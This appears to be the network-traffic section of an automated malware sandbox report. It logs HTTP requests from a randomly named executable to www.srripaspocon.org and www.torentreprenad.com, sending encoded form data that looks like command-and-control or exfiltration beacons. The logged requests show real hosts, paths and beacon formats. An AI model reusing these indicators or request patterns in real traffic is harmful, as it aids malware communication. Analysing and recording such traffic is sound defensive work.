                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
                                                                            Jun 19, 2024 22:40:35.772567987 CEST238INData Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.44977115.204.0.108805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:37.720072031 CEST722OUTPOST /egr4/ HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.srripaspocon.org
                                                                            Referer: http://www.srripaspocon.org/egr4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 37 55 6b 54 57 77 4a 52 51 57 51 32 78 37 65 32 36 77 54 4d 64 74 2f 74 79 47 30 56 6f 37 74 72 58 55 57 5a 6b 6f 72 71 4e 67 72 70 6d 56 74 4b 56 5a 4e 61 35 30 79 73 55 70 7a 71 36 2f 62 39 6e 6b 4b 56 49 66 53 45 33 68 76 53 39 50 35 6d 78 4e 72 34 52 7a 71 56 6e 6f 33 30 58 77 75 47 77 37 75 64 56 54 55 61 41 6f 4a 54 50 39 4d 41 32 78 38 70 2b 2f 56 67 77 36 62 6d 58 31 37 31 78 5a 52 31 4f 53 6d 6a 6a 4d 38 61 7a 64 75 78 35 45 45 6d 46 69 31 4b 69 51 54 68 34 4c 45 6f 50 42 36 45 37 6e 4d 5a 64 74 39 33 68 6c 2f 2f 38 65 47 51 2b 4a 6a 2b 51 7a 55 74 46 71 6c 49 7a 6b 31 4e 33 4a 62 75 56 65 55 3d
                                                                            Data Ascii: tF1tk6=DqO7igyO8zuo7UkTWwJRQWQ2x7e26wTMdt/tyG0Vo7trXUWZkorqNgrpmVtKVZNa50ysUpzq6/b9nkKVIfSE3hvS9P5mxNr4RzqVno30XwuGw7udVTUaAoJTP9MA2x8p+/Vgw6bmX171xZR1OSmjjM8azdux5EEmFi1KiQTh4LEoPB6E7nMZdt93hl//8eGQ+Jj+QzUtFqlIzk1N3JbuVeU=
                                                                            Jun 19, 2024 22:40:38.339539051 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:38 GMT
                                                                            Server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
                                                                            Jun 19, 2024 22:40:38.339600086 CEST238INData Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.44977215.204.0.108805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:40.247488976 CEST10804OUTPOST /egr4/ HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.srripaspocon.org
                                                                            Referer: http://www.srripaspocon.org/egr4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 37 55 6b 54 57 77 4a 52 51 57 51 32 78 37 65 32 36 77 54 4d 64 74 2f 74 79 47 30 56 6f 39 31 72 55 69 43 5a 72 72 7a 71 4d 67 72 70 34 6c 74 4c 56 5a 4d 61 35 30 61 7a 55 70 50 36 36 39 6a 39 31 56 71 56 5a 65 53 45 39 68 76 53 78 76 35 6e 2f 74 71 69 52 79 61 52 6e 73 54 30 58 77 75 47 77 39 71 64 53 48 49 61 43 6f 4a 51 5a 4e 4d 48 79 78 39 38 2b 2f 4e 65 77 36 66 63 55 45 62 31 30 4a 42 31 4d 67 65 6a 68 73 38 45 30 64 75 70 35 45 4a 34 46 69 34 37 69 51 57 30 34 4d 30 6f 4e 33 4c 4f 76 6a 45 41 66 4f 56 53 36 47 66 39 7a 63 33 54 68 62 37 59 42 51 49 73 66 36 6b 6c 35 6c 5a 42 6b 4a 58 71 4f 37 75 52 63 34 6d 35 62 56 46 4e 6c 45 6b 47 55 68 2f 52 5a 36 33 64 42 78 6c 32 46 51 6c 52 58 52 39 5a 38 51 7a 4d 52 66 5a 30 56 38 58 6f 57 47 31 31 70 6e 68 6c 58 71 61 77 33 72 62 5a 6c 36 53 68 6a 63 2f 64 50 68 69 36 51 76 71 56 56 75 4d 6e 4a 34 33 73 4a 66 61 46 61 36 54 63 56 73 56 53 68 6a 51 74 76 4e 48 50 4b 64 6c 79 36 72 37 45 32 78 78 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=DqO7igyO8zuo7UkTWwJRQWQ2x7e26wTMdt/tyG0Vo91rUiCZrrzqMgrp4ltLVZMa50azUpP669j91VqVZeSE9hvSxv5n/tqiRyaRnsT0XwuGw9qdSHIaCoJQZNMHyx98+/New6fcUEb10JB1Mgejhs8E0dup5EJ4Fi47iQW04M0oN3LOvjEAfOVS6Gf9zc3Thb7YBQIsf6kl5lZBkJXqO7uRc4m5bVFNlEkGUh/RZ63dBxl2FQlRXR9Z8QzMRfZ0V8XoWG11pnhlXqaw3rbZl6Shjc/dPhi6QvqVVuMnJ43sJfaFa6TcVsVShjQtvNHPKdly6r7E2xxqUuVBYPy3EOSg4lgciZtqvjU/X6NO3vCnTWvPAwIrqIkE1yr+YFbzsMk9c65fTHAMfh7t8xy2cWUZ/PkbNeSCzE04nYcz+q5Ql1zqTLdBvxM3FxRMGtxC3ZqHeohvJq+wSUTWt/t3ZAx8MvFjPn1fcqvvK2AF3CHxO5dxa4Hr5+Xo7+B4FIX07wvvtQgZt+mgAQwsViwPnz1TicFXZgd27zdjMiM2dtqX6wSkn5a3mrACmsDm2MJPFLhjjMmRPnEmGriroABqKeE6marKv82KPfL7ckb1lYIBdRkWQDLaBFXaN8P8FFaw1PYVVgDA0S9RvH/MBtEtWF4Lp/IcA70/kHTvTg+eLe4oxcoOBfgrMI62zFOQoyI66ZXEnxe80gAkamHMPoxxqCj/9KSTfgI2mfsEr8qJheJW/EGQqYUWSJVweI4749ZYXC7tOMsc6b68rU3mln26TcOo+BWNIYijkrpOEylPHd3tyzUOjdEdiaR1jFUNWZq5anOt0y2sDd1UAZNNxuM6EW8WlRthRsHvkTQCuxH38LHYsfSi9L+rH9sXcEDeT/dUlYAoCiNSq1bWyIAwVoRnh2z59DtGoKRX16QfJ+RgKtFb3e7E6N4qNMe0dkESUXdWoXBvqUMJwu1pGBRfMrKrHJQlax5aMdxuDMCSS5OjUui+K [TRUNCATED]
                                                                            Jun 19, 2024 22:40:40.867074013 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:40 GMT
                                                                            Server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
                                                                            Jun 19, 2024 22:40:40.867122889 CEST238INData Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.44977315.204.0.108805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:42.779244900 CEST435OUTGET /egr4/?tF1tk6=OombhWzhkCuNqFAREgI5QSI/n6iJ7yj7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC0S7x9ud02r6ucB+LtM+AWVrEw63feFc+fJU=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:40:43.373780012 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:43 GMT
                                                                            Server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
                                                                            Jun 19, 2024 22:40:43.373861074 CEST238INData Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.449774194.9.94.86805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:56.623074055 CEST708OUTPOST /r45o/ HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.torentreprenad.com
                                                                            Referer: http://www.torentreprenad.com/r45o/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 38 69 48 52 36 66 39 50 6c 70 65 6d 57 6a 6d 4a 5a 4f 64 35 50 71 59 53 63 31 35 6d 36 6f 31 55 72 63 50 50 6f 65 31 38 6d 71 76 73 41 41 47 6d 6b 69 2f 79 41 69 76 6c 39 48 58 53 6d 50 76 41 46 6c 50 5a 52 38 38 79 73 33 66 59 41 36 44 79 41 4f 6a 53 34 6e 56 66 68 6a 57 65 63 52 6c 4e 58 2f 32 48 39 59 49 35 59 63 74 32 67 72 6d 75 2b 69 34 6c 37 38 6d 2b 54 37 35 4c 78 45 6d 59 62 74 41 73 35 66 33 4a 36 57 6c 6a 73 38 72 42 58 4f 2b 46 77 7a 61 6c 5a 52 4f 76 51 32 42 7a 41 4a 6a 45 36 45 66 38 61 5a 68 58 6d 58 7a 35 53 2b 4c 79 39 41 3d 3d
                                                                            Data Ascii: tF1tk6=txGZWh/o/5868iHR6f9PlpemWjmJZOd5PqYSc15m6o1UrcPPoe18mqvsAAGmki/yAivl9HXSmPvAFlPZR88ys3fYA6DyAOjS4nVfhjWecRlNX/2H9YI5Yct2grmu+i4l78m+T75LxEmYbtAs5f3J6Wljs8rBXO+FwzalZROvQ2BzAJjE6Ef8aZhXmXz5S+Ly9A==
                                                                            Jun 19, 2024 22:40:57.258317947 CEST1236INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:40:57 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:40:57.258400917 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                                                            Jun 19, 2024 22:40:57.258450985 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                                                                            Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                                                            Jun 19, 2024 22:40:57.258498907 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                                                                            Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                                                            Jun 19, 2024 22:40:57.258548021 CEST1236INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
